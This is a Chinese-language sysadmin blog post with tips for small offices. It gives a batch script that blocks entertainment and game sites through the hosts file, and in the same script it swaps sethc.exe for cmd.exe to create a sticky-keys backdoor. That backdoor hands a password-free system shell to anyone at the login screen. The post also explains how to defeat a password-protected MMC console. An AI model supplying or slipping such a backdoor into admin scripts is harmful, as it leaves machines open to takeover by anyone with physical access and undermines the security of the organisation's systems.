系统管理员应该知道的小伎俩『罗斌个人工作经验谈』

一、屏蔽网站：
为什么要屏蔽这些网站呢？这个你要去问老板去，小企业买不起高档的上网行为管理设备，（像深信服的设备就不错，可是就是贵了点，而且每年还要交升级费，个人觉得没必要买这个破玩意儿），那就只能用最原始最低级的办法来解决咯，通过修改hosts文件来实现对网站的屏蔽。hosts文件在C:\Windows\System32\Drivers\etc如果你不想访问www.QQ.com，就在在Hosts写上以下内容：　　
127.0.0.1 www.QQ.com #屏蔽的网站　　
0.0.0.0 www.QQ.com #屏蔽的网站

这样就无法通过浏览器访问WWW.QQ.COM了
下面是我写的批处理，方便一次添加许多个想要屏蔽的网址，同时还增加了后门的小功能。
把下面代码复制到记事本，保存为 .bat的文件运行就可以了。

::以下是屏蔽一些视频网站，以及博客网站，在线游戏网站等等。你想屏蔽什么网站就按照下面的格式写进去运行就是了，
::写完了运行下，就不能访问下面这些网站了。打开下面的这些网站直接就无法显示！！！

@title 屏蔽上班时间不允许访问的网站，以及给电脑设置后门！――罗斌制作 QQ：287727615

@echo 127.0.0.1 web.qq.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.youku.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.tudou.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 video.sina.com.cn #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.ku6.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.funshion.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.funshion.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.qidian.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.readnovel.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.xxsy.net #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.hongxiu.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.zhulang.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 book.sina.com.cn #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.17173.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.4399.net #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 http://tl.changyou.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.7k7k.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 my.91.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 wd.gyyx.cn #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 http://qzone.qq.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.51.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.skycn.com #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 www.onlinedown.net #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 dl.pconline.com.cn #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts
@echo 127.0.0.1 tech.sina.com.cn/down/ #屏蔽的网站 >>c:\WINDOWS\system32\drivers\etc\hosts

::再来个shift后门就更保险了，以后万一哪个员工走掉设了密码，不用辛苦的去破解密码了。

@cd C:\WINDOWS\system32

@ren sethc.exe sethcll.exe

@copy cmd.exe sethc.exe

二、禁止员工运行QQ等聊天工具：
开始――运行――gpedit.msc――打开组策略，展开 计算机配置――windows设置――安全设置――软件限制策略――其他规则――右击 新建散列规则 ――点击 浏览 按钮 找到QQ的安装路径 ，确定后它会自动算出该程序的散列值（应该就是程序的MD5值），这样就算把程序的名字改了，照样不能运行。弹出被阻止的对话框！！！





最后就是打开CMD运行gpupdate /force 强制更新下组策略就OK了。
如果你担心有懂电脑的员工破解你的组策略，那我就给你个强硬的东西给你，它就是 mmc控制台加密.exe 点击下载就是了。给它来道密码，当员工在运行里面输入MMC，或者gpedit.msc 都需要输入密码才能打开组策略，当然也不是没有办法破解这个的。最简单的办法还是去其他没有加密的电脑的system32下面把MMC.EXE复制过来替换下就破解了。哈哈。。。

转载文章请标明：该文章转自 罗斌原创技术文章：http://luobin44.51.com 〖罗斌个人工作经验谈〗
本文出自 “罗斌个人原创天地” 博客，请务必保留此出处http://luobin.blog.51cto.com/882147/204750